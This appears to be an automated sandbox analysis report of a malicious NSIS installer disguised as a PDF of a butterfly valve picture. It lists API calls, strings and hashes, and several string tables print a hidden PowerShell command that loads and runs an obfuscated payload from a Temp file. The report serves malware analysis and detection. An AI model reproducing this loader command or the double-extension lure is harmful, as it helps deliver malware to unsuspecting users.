String ID: "C:\Users\user\Desktop\PTFE Coated Butterfly Valve Picture#U00b7pdf.exe"$.DEFAULT\Control Panel\International$.exe$1033$: Completed$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\Servicebureauet\aloe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$Robotagtige Setup: Completed$_Nb
API String ID: 1975747703-2384579136
Opcode ID: 5c13432dcba976acc153c6c4cb0ae4a4ceee92b52a3611d71cd5da1aeea12791
Instruction ID: cdcda0c5d6d895e27caec97b3fe99e3f57ebd92391a3aca4eab7d54baf018be6
Opcode Fuzzy Hash: 5c13432dcba976acc153c6c4cb0ae4a4ceee92b52a3611d71cd5da1aeea12791
Instruction Fuzzy Hash: FA61C8B16442007ED620BF669D45F373AACEB44759F40447FF941B22E2C77CAD029A2D

Function 00402C66 Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 182
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00402C77
GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\PTFE Coated Butterfly Valve Picture#U00b7pdf.exe,00000400), ref: 00402C93

Part of subcall function 0040596C: GetFileAttributesA.KERNELBASE(00000003,00402CA6,C:\Users\user\Desktop\PTFE Coated Butterfly Valve Picture#U00b7pdf.exe,80000000,00000003), ref: 00405970
Part of subcall function 0040596C: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405992

GetFileSize.KERNEL32(00000000,00000000,0042B000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\PTFE Coated Butterfly Valve Picture#U00b7pdf.exe,C:\Users\user\Desktop\PTFE Coated Butterfly Valve Picture#U00b7pdf.exe,80000000,00000003), ref: 00402CDF

Strings

Null, xrefs: 00402D5D
C:\Users\user\Desktop\PTFE Coated Butterfly Valve Picture#U00b7pdf.exe, xrefs: 00402C7D, 00402C8C, 00402CA0, 00402CC0
C:\Users\user\AppData\Local\Temp\, xrefs: 00402C6D
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402E3E
C:\Users\user\Desktop, xrefs: 00402CC1, 00402CC6, 00402CCC
"C:\Users\user\Desktop\PTFE Coated Butterfly Valve Picture#U00b7pdf.exe", xrefs: 00402C66
Error launching installer, xrefs: 00402CB6
soft, xrefs: 00402D54
Inst, xrefs: 00402D4B

Memory Dump Source

Source File: 00000000.00000002.1698979974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1698963107.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1698995543.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699142535.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PTFE Coated Butterfly Valve Picture#U00b7pdf.jbxd

Similarity

API ID: File$AttributesCountCreateModuleNameSizeTick
String ID: "C:\Users\user\Desktop\PTFE Coated Butterfly Valve Picture#U00b7pdf.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\PTFE Coated Butterfly Valve Picture#U00b7pdf.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
API String ID: 4283519449-3301915109
Opcode ID: 3f665217ac2245ad92c498c6fa1e551097c863ebe5e03bc44dd447b4a8322165
Instruction ID: 1839f4375b44da3097aca9d4a8c6c84b0463c2d100b7a2d698c12080187f488f
Opcode Fuzzy Hash: 3f665217ac2245ad92c498c6fa1e551097c863ebe5e03bc44dd447b4a8322165
Instruction Fuzzy Hash: BF51B6B1A41214ABDF109F65DE89B9E7AB4EF00355F14403BF904B62D1C7BC9E418B9D

Function 00401751 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 147
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrcatA.KERNEL32(00000000,00000000,CreateTimer,C:\Users\user\AppData\Local\Temp\Servicebureauet\aloe\laet\Unfilialness,00000000,00000000,00000031), ref: 00401790
CompareFileTime.KERNEL32(-00000014,?,CreateTimer,CreateTimer,00000000,00000000,CreateTimer,C:\Users\user\AppData\Local\Temp\Servicebureauet\aloe\laet\Unfilialness,00000000,00000000,00000031), ref: 004017BA

Part of subcall function 00405CF9: lstrcpynA.KERNEL32(?,?,00000400,00403187,00422F00,NSIS Error), ref: 00405D06

Part of subcall function 00404F12: lstrlenA.KERNEL32(sportspladsers,00000000,0040E8C0,00000000,?,?,?,?,?,?,?,?,?,00402FCF,00000000,?), ref: 00404F4B
Part of subcall function 00404F12: lstrlenA.KERNEL32(00402FCF,sportspladsers,00000000,0040E8C0,00000000,?,?,?,?,?,?,?,?,?,00402FCF,00000000), ref: 00404F5B
Part of subcall function 00404F12: lstrcatA.KERNEL32(sportspladsers,00402FCF,00402FCF,sportspladsers,00000000,0040E8C0,00000000), ref: 00404F6E
Part of subcall function 00404F12: SetWindowTextA.USER32(sportspladsers,sportspladsers), ref: 00404F80
Part of subcall function 00404F12: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404FA6
Part of subcall function 00404F12: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404FC0
Part of subcall function 00404F12: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404FCE

Strings

C:\Users\user\AppData\Local\Temp\nst5070.tmp, xrefs: 0040179B, 0040180A, 00401828
CreateTimer, xrefs: 0040176D, 00401776, 00401783, 00401795, 004017A6, 004017DC, 004017F2, 00401810, 00401850, 004018D1, 004018DA, 004018E4, 004018EF
C:\Users\user\AppData\Local\Temp\Servicebureauet\aloe\laet\Unfilialness, xrefs: 0040177E
C:\Users\user\AppData\Local\Temp\nst5070.tmp\nsDialogs.dll, xrefs: 0040181E, 0040183A
"powershell.exe" -windowstyle hidden "$Superintendency=Get-Content 'C:\Users\user\AppData\Local\Temp\Servicebureauet\aloe\Reshipment.Bag';$Fjernskrivendes=$Superintendency.SubString(1030,3);.$Fjernskrivendes($Superintendency)", xrefs: 00401805, 00401811, 00401829

Memory Dump Source

Source File: 00000000.00000002.1698979974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1698963107.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1698995543.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699142535.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PTFE Coated Butterfly Valve Picture#U00b7pdf.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID: "powershell.exe" -windowstyle hidden "$Superintendency=Get-Content 'C:\Users\user\AppData\Local\Temp\Servicebureauet\aloe\Reshipment.Bag';$Fjernskrivendes=$Superintendency.SubString(1030,3);.$Fjernskrivendes($Superintendency)"$C:\Users\user\AppData\Local\Temp\Servicebureauet\aloe\laet\Unfilialness$C:\Users\user\AppData\Local\Temp\nst5070.tmp$C:\Users\user\AppData\Local\Temp\nst5070.tmp\nsDialogs.dll$CreateTimer
API String ID: 1941528284-1498539142
Opcode ID: 717bbc974399765322aab804ce65b0cd2922970306079a4e6ebe60fbc67e86b2
Instruction ID: dfa66b7161a0f16b13ad00a25904a83b243dedeb6ee7557d1be3b523159fd244
Opcode Fuzzy Hash: 717bbc974399765322aab804ce65b0cd2922970306079a4e6ebe60fbc67e86b2
Instruction Fuzzy Hash: 5641D572910515BACF107BB5CC85EAF3679EF45329B20823BF521F20E2D63C4A419B6D

Function 00404F12 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73
stringwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenA.KERNEL32(sportspladsers,00000000,0040E8C0,00000000,?,?,?,?,?,?,?,?,?,00402FCF,00000000,?), ref: 00404F4B
lstrlenA.KERNEL32(00402FCF,sportspladsers,00000000,0040E8C0,00000000,?,?,?,?,?,?,?,?,?,00402FCF,00000000), ref: 00404F5B
lstrcatA.KERNEL32(sportspladsers,00402FCF,00402FCF,sportspladsers,00000000,0040E8C0,00000000), ref: 00404F6E
SetWindowTextA.USER32(sportspladsers,sportspladsers), ref: 00404F80
SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404FA6
SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404FC0
SendMessageA.USER32(?,00001013,?,00000000), ref: 00404FCE

Strings

sportspladsers, xrefs: 00404F32, 00404F44, 00404F4A, 00404F6D, 00404F79

Memory Dump Source

Source File: 00000000.00000002.1698979974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1698963107.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1698995543.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699142535.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PTFE Coated Butterfly Valve Picture#U00b7pdf.jbxd

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID: sportspladsers
API String ID: 2531174081-2609567324
Opcode ID: 558402415f57fe0eb81db75807d2d057a66030d2c136bde9c432be6294094776
Instruction ID: 5a9a404093729f8c7a4ed64dcb73daf90ff889549f225b9df3951733f5861a8d
Opcode Fuzzy Hash: 558402415f57fe0eb81db75807d2d057a66030d2c136bde9c432be6294094776
Instruction Fuzzy Hash: EB219DB1A00119BADF119FA5DD84ADEBFB9EF44354F14807AF904B6290C7788E41DBA8

Function 004053D8 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 39
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 0040541B
GetLastError.KERNEL32 ref: 0040542F
SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 00405444
GetLastError.KERNEL32 ref: 0040544E

Strings

ds@, xrefs: 0040540D
C:\Users\user\AppData\Local\Temp\, xrefs: 004053FE
C:\Users\user\Desktop, xrefs: 004053D8
ts@, xrefs: 004053DE

Memory Dump Source

Source File: 00000000.00000002.1698979974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1698963107.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1698995543.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699142535.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PTFE Coated Butterfly Valve Picture#U00b7pdf.jbxd

Similarity

API ID: ErrorLast$CreateDirectoryFileSecurity
String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$ds@$ts@
API String ID: 3449924974-3946084282
Opcode ID: f69d3160a82a2859f106a017fa20b71bd819ec85ae22b078452fa26fbc967781
Instruction ID: 5d613d5f07efa900d759e60f8f8ec78c4c71b6ffd2fe208e339ff175f81ef67f
Opcode Fuzzy Hash: f69d3160a82a2859f106a017fa20b71bd819ec85ae22b078452fa26fbc967781
Instruction Fuzzy Hash: F3010871D14259EADF119FA0D9487EFBFB8EB04315F00417AE904B6280D378A644CFAA

Function 00406024 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0040603B
wsprintfA.USER32 ref: 00406074
LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 00406088

Strings

\, xrefs: 0040604C
%s%s.dll, xrefs: 0040606E
UXTHEME, xrefs: 0040602D

Memory Dump Source

Source File: 00000000.00000002.1698979974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1698963107.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1698995543.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699142535.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PTFE Coated Butterfly Valve Picture#U00b7pdf.jbxd

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%s.dll$UXTHEME$\
API String ID: 2200240437-4240819195
Opcode ID: 38f932dad6d10820f3564912fa7e39c047c8ada2afd73a6a353afcde48b08f1a
Instruction ID: 72752c577983536edbae7b7a4b2c1439e1101fa4b93fa8d0208d5a4e16dde88a
Opcode Fuzzy Hash: 38f932dad6d10820f3564912fa7e39c047c8ada2afd73a6a353afcde48b08f1a
Instruction Fuzzy Hash: E6F0FC30A40109AADB14E764DC0DFEB365CAB09305F140576A546E11D1D578E9258B69

Function 00402E9F Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 155
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00402EFD
GetTickCount.KERNEL32 ref: 00402F7E
MulDiv.KERNEL32(7FFFFFFF,00000064,00000020), ref: 00402FAB
wsprintfA.USER32 ref: 00402FBB

Strings

... %d%%, xrefs: 00402FB5

Memory Dump Source

Source File: 00000000.00000002.1698979974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1698963107.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1698995543.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699142535.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PTFE Coated Butterfly Valve Picture#U00b7pdf.jbxd

Similarity

API ID: CountTick$wsprintf
String ID: ... %d%%
API String ID: 551687249-2449383134
Opcode ID: 9602dbfda00556d7c5e8c3807bc55e7cb8e0f1d2c4b54ec9ade86eedd9cec4cc
Instruction ID: 4ab2a5a1bcd3fb7fa9d72e81aa521510b391fe67da8672e6f00875cd24a8b3cf
Opcode Fuzzy Hash: 9602dbfda00556d7c5e8c3807bc55e7cb8e0f1d2c4b54ec9ade86eedd9cec4cc
Instruction Fuzzy Hash: 7D518F729022199BDF10DF65DA08A9F7BB8AF40795F14413BF800B72C4C7789E51DBAA

Function 00401F90 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 00401FBB

Part of subcall function 00404F12: lstrlenA.KERNEL32(sportspladsers,00000000,0040E8C0,00000000,?,?,?,?,?,?,?,?,?,00402FCF,00000000,?), ref: 00404F4B
Part of subcall function 00404F12: lstrlenA.KERNEL32(00402FCF,sportspladsers,00000000,0040E8C0,00000000,?,?,?,?,?,?,?,?,?,00402FCF,00000000), ref: 00404F5B
Part of subcall function 00404F12: lstrcatA.KERNEL32(sportspladsers,00402FCF,00402FCF,sportspladsers,00000000,0040E8C0,00000000), ref: 00404F6E
Part of subcall function 00404F12: SetWindowTextA.USER32(sportspladsers,sportspladsers), ref: 00404F80
Part of subcall function 00404F12: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404FA6
Part of subcall function 00404F12: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404FC0
Part of subcall function 00404F12: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404FCE

LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00401FCB
GetProcAddress.KERNEL32(00000000,?), ref: 00401FDB
FreeLibrary.KERNELBASE(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 00402045

Strings

"powershell.exe" -windowstyle hidden "$Superintendency=Get-Content 'C:\Users\user\AppData\Local\Temp\Servicebureauet\aloe\Reshipment.Bag';$Fjernskrivendes=$Superintendency.SubString(1030,3);.$Fjernskrivendes($Superintendency)", xrefs: 0040200F

Memory Dump Source

Source File: 00000000.00000002.1698979974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1698963107.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1698995543.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699142535.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PTFE Coated Butterfly Valve Picture#U00b7pdf.jbxd

Similarity

API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
String ID: "powershell.exe" -windowstyle hidden "$Superintendency=Get-Content 'C:\Users\user\AppData\Local\Temp\Servicebureauet\aloe\Reshipment.Bag';$Fjernskrivendes=$Superintendency.SubString(1030,3);.$Fjernskrivendes($Superintendency)"
API String ID: 2987980305-774058556
Opcode ID: c931239866a18927b86319141aba466e32f85728b26c7023af3430785e4db318
Instruction ID: 033e4e5f5e4c037d50d2464c5542d6b5672e4837e9f8cb01fb8d89ff16108e1c
Opcode Fuzzy Hash: c931239866a18927b86319141aba466e32f85728b26c7023af3430785e4db318
Instruction Fuzzy Hash: 1A212B72904211FBDF217FA48E49AAE76B1AB45318F30423BF701B62D0C7BD49459A6E

Function 0040599B Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 004059AF
GetTempFileNameA.KERNELBASE(?,?,00000000,?), ref: 004059C9

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 0040599E
nsa, xrefs: 004059A6
"C:\Users\user\Desktop\PTFE Coated Butterfly Valve Picture#U00b7pdf.exe", xrefs: 0040599B

Memory Dump Source

Source File: 00000000.00000002.1698979974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1698963107.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1698995543.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699142535.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PTFE Coated Butterfly Valve Picture#U00b7pdf.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: "C:\Users\user\Desktop\PTFE Coated Butterfly Valve Picture#U00b7pdf.exe"$C:\Users\user\AppData\Local\Temp\$nsa
API String ID: 1716503409-976808427
Opcode ID: a71f6d19a672690ae76045f6a92713abfaab32ef542e638d1cc3651a1fbf987a
Instruction ID: 3a3981258a6ccd3f3c7180c2fb01dffc681fdc90015df490a153c8b64b3610b8
Opcode Fuzzy Hash: a71f6d19a672690ae76045f6a92713abfaab32ef542e638d1cc3651a1fbf987a
Instruction Fuzzy Hash: 6DF08276708214ABEB108F55EC04B9B7B9CDF91760F10C03BFA48DA190D6B599548B99

Function 004015B3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON

Download Yara Rule

APIs

Part of subcall function 00405804: CharNextA.USER32(?,?,C:\Users\user\AppData\Local\Temp\nst5070.tmp,?,00405870,C:\Users\user\AppData\Local\Temp\nst5070.tmp,C:\Users\user\AppData\Local\Temp\nst5070.tmp,74DF3410,?,C:\Users\user\AppData\Local\Temp\,004055BB,?,74DF3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405812
Part of subcall function 00405804: CharNextA.USER32(00000000), ref: 00405817
Part of subcall function 00405804: CharNextA.USER32(00000000), ref: 0040582B

GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 00401605

Part of subcall function 004053D8: CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 0040541B

SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp\Servicebureauet\aloe\laet\Unfilialness,00000000,00000000,000000F0), ref: 00401634

Strings

C:\Users\user\AppData\Local\Temp\Servicebureauet\aloe\laet\Unfilialness, xrefs: 00401629

Memory Dump Source

Source File: 00000000.00000002.1698979974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1698963107.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1698995543.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699142535.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PTFE Coated Butterfly Valve Picture#U00b7pdf.jbxd

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentFile
String ID: C:\Users\user\AppData\Local\Temp\Servicebureauet\aloe\laet\Unfilialness
API String ID: 1892508949-203921112
Opcode ID: dc3f2b08dd0b23deb2200b8cff6eb9b6ab41173e829b03834ce904b4ad95c354
Instruction ID: 4fb2b9239308f527e4829455642bf5c86be9504270dcf99fcce102751257b2ff
Opcode Fuzzy Hash: dc3f2b08dd0b23deb2200b8cff6eb9b6ab41173e829b03834ce904b4ad95c354
Instruction Fuzzy Hash: 1611E736508141ABEF217F650D415BF27B0EA92325738467FE592B62E2C63C4942A63F

Function 0040548A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00421510,Error launching installer), ref: 004054B3
CloseHandle.KERNEL32(?), ref: 004054C0

Strings

Error launching installer, xrefs: 0040549D

Memory Dump Source

Source File: 00000000.00000002.1698979974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1698963107.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1698995543.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699142535.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PTFE Coated Butterfly Valve Picture#U00b7pdf.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: Error launching installer
API String ID: 3712363035-66219284
Opcode ID: 8c32d595c10ae78cfc35805ab98709760fd6cf99201592758dbf5461ff55bb51
Instruction ID: 90ee3f3d0c484d323fd0424032eb65db2415cafeee3384e03f1d9bc4b04e7a5d
Opcode Fuzzy Hash: 8c32d595c10ae78cfc35805ab98709760fd6cf99201592758dbf5461ff55bb51
Instruction Fuzzy Hash: FFE04FB4A002097FEB009B60EC05F7B7BBCEB00348F408561BD11F21A0E374A9508A78

Function 00406779 Relevance: 5.2, APIs: 4, Instructions: 236COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1698979974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

